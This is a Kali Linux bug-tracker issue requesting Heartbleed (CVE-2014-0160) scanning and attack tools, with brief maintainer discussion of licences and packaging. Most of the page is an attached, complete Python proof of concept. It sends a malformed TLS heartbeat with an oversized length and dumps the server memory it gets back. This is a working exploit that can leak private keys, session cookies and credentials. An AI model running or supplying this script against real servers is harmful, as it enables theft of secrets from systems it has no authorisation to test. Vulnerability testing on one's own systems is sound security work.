View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0001147Kali LinuxNew Tool Requestspublic2014-04-11 19:312020-03-18 17:47
ReporterPokeswap Assigned To 
PrioritynormalSeverityfeatureReproducibilityN/A
Status closedResolutionsuspended 
Platformx64OSKaliOS Version1.0
Summary0001147: heart bleed tools (Heartbleeder, Heartbleed Attack POC and Mass Scanner, Heartbleed Honeypot Script)
Description

Please add heart bleed tools to the kali repos.
here are some I have found (as well as a metasploit module and nmap NSE script)
Heartbleeder: Tests your servers for OpenSSL: https://github.com/titanous/heartbleeder?files=1
Heartbleed Attack POC and Mass Scanner: https://bitbucket.org/fb1h2s/cve-2014-0160
Heartbleed Honeypot Script: http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Attached Files
2014-0160.py (4,437 bytes)    
#!/usr/bin/python
 
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
 
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
from binascii import unhexlify
 
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
 
def h2bin(x):
    #x=x.encode('ascii', 'strict')
    return unhexlify(x.replace(' ', '').replace('\n', ''))
 
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')
 
hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')
 
def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ('  %04x: %-48s %s' % (b, hxdat, pdat))
    print
 
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        
 
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print ('Unexpected EOF receiving record header - server closed connection')
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print ('Unexpected EOF receiving record payload - server closed connection')
        return None, None, None
    print (' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
    return typ, ver, pay
 
def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print ('No heartbeat response received, server likely not vulnerable')
            return False
 
        if typ == 24:
            print ('Received heartbeat response:')
            hexdump(pay)
            if len(pay) > 3:
                print ('WARNING: server returned more data than it should - server is vulnerable!')
            else:
                print ('Server processed malformed heartbeat, but did not return any extra data.')
            return True
 
        if typ == 21:
            print ('Received alert:')
            hexdump(pay)
            print ('Server returned error, likely not vulnerable')
            return False
 
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print ('Connecting...')
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print ('Sending Client Hello...')
    sys.stdout.flush()
    s.send(hello)
    print ('Waiting for Server Hello...')
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print ('Server closed connection without sending Server Hello.')
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
 
    print ('Sending heartbeat request...')
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
 
if __name__ == '__main__':
    main()
2014-0160.py (4,437 bytes)   

Activities

crossbower

crossbower

2014-04-13 09:20

reporter   ~0001688

I have sent an email to the creators of Heartbleed Attack POC and Mass Scanner and Heartbleed Honeypot Script, requesting some info about the license of the tools.

For Heartbleeder, it requires a version of the go language we currently do not support.

I'm waiting for the replies
glitch

glitch

2014-04-14 03:07

reporter   ~0001691

Code has been updated with GPLv3 and version 0.1.1
crossbower

crossbower

2014-04-27 19:56

reporter   ~0001732

Heartbleed Honeypot Script added
g0tmi1k

g0tmi1k

2018-01-29 14:59

administrator   ~0008405

To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will for us):

  • [Name] - The name of the tool
  • [Version] - What version of the tool should be added?
    --- If it uses source control (such as git), please make sure there is a release to match (e.g. git tag)
  • [Homepage] - Where can the tool be found online? Where to go to get more information?
  • [Download] - Where to go to get the tool?
  • [Author] - Who made the tool?
  • [Licence] - How is the software distributed? What conditions does it come with?
  • [Description] - What is the tool about? What does it do?
  • [Dependencies] - What is needed for the tool to work?
  • [Similar tools] - What other tools are out there?
  • [How to install] - How do you compile it?
  • [How to use] - What are some basic commands/functions to demonstrate it?
g0tmi1k

g0tmi1k

2018-01-30 10:41

administrator   ~0008576

Wonder if this would be better on exploit-db.com...
g0tmi1k

g0tmi1k

2020-03-18 17:47

administrator   ~0012452

No response... Closing.

Please reopen if the information can be provided.

Issue History

Date Modified Username Field Change
2014-04-11 19:31 Pokeswap New Issue
2014-04-13 09:20 crossbower Note Added: 0001688
2014-04-13 09:21 crossbower Assigned To => crossbower
2014-04-13 09:21 crossbower Status new => feedback
2014-04-14 03:07 glitch Note Added: 0001691
2014-04-14 10:18 Pokeswap File Added: 2014-0160.py
2014-04-27 19:56 crossbower Note Added: 0001732
2014-05-12 17:16 xploitx Issue cloned: 0001204
2018-01-26 09:57 g0tmi1k Status feedback => new
2018-01-26 09:57 g0tmi1k Category Feature Requests => New Tool Requests
2018-01-29 10:10 g0tmi1k Assigned To crossbower =>
2018-01-29 10:10 g0tmi1k Priority high => normal
2018-01-29 10:10 g0tmi1k Severity major => minor
2018-01-29 10:10 g0tmi1k Summary hart bleed tools => heart bleed tools (Heartbleeder, Heartbleed Attack POC and Mass Scanner, Heartbleed Honeypot Script)
2018-01-29 14:59 g0tmi1k Note Added: 0008405
2018-01-30 10:41 g0tmi1k Note Added: 0008576
2019-12-09 13:30 g0tmi1k Severity minor => feature
2020-03-18 17:47 g0tmi1k Status new => closed
2020-03-18 17:47 g0tmi1k Resolution open => suspended
2020-03-18 17:47 g0tmi1k Note Added: 0012452